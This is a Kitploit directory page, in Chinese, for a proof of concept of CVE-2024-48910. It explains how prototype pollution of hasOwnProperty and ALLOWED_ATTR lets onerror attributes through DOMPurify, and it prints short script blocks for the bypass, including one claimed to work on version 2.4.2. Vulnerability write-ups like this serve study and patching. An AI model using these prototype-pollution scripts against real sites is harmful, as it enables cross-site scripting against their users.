Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-48910-PoC — 针对CVE-2024-48910的概念验证漏洞利用,演示通过原型污染绕过DOMPurify XSS清理器,利用构造的HTML属性执行任意JavaScript。 | Kitploit
工具/GitHubGitHub/mitchellzhou1/cve-2024-48910-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全
GitHubmitchellzhou1/cve-2024-48910-poc

CVE-2024-48910-PoC

针对CVE-2024-48910的概念验证漏洞利用,演示通过原型污染绕过DOMPurify XSS清理器,利用构造的HTML属性执行任意JavaScript。

查看仓库
28个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-48910-PoC

image

概述

CVE-2024-48910 DOMPurify,一个仅适用于 DOM、超快速、超容错的 HTML、MathML 和 SVG XSS 清理器,被发现存在原型污染漏洞(CVE-2024-48910)。该漏洞于 2024 年 10 月 31 日首次披露,并在 2.4.2 版本中修复。


影响

DOMPurify 中的原型污染漏洞可能允许攻击者篡改对象原型属性,从而导致安全绕过和应用程序行为的未授权修改。较高的 CVSS 分数表明对系统安全的潜在影响显著,尤其会影响数据机密性和完整性。

技术细节

该漏洞的 CVSS v3.1 基础评分为 9.1(严重),向量字符串为 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N。这表明该漏洞可通过远程方式利用,攻击复杂度低,无需权限或用户交互,并对机密性和完整性产生高影响,但不会影响可用性。

从更新日志中可以看出,添加了一个涉及 .__proto__. 的测试用例,表明存在原型注入问题。 image

随后添加的一行代码意味着,在此之前,对于任何“真值”的内容,其评估结果均为 true。 image

攻击流程与 PoC

  1. 污染 hasOwnProperty 使其返回 Object
  2. 污染 ALLOWED_ATTR 使其包含 ["src", "onerror"]
  3. DOMPurify 使用易受攻击的 clone() 函数克隆其配置
  4. hasOwnProperty 检查对被污染的属性通过(因为 Object 是真值)
  5. 被污染的配置被复制到 DOMPurify 的内部配置中

XSS 保护被绕过——onerror 现在被“允许”了

root@kitploit:~
<script>Object.prototype.hasOwnProperty=Object</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize(''))</script>

附注:

尽管升级到了 2.4.2,我仍然能够触发 alert()……你只需要设置 Object.prototype.hasOwnProperty = () => true; 即可绕过保护 LOL!!

root@kitploit:~
<script>Object.prototype.hasOwnProperty = () => true;</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize(''))</script>
下载工具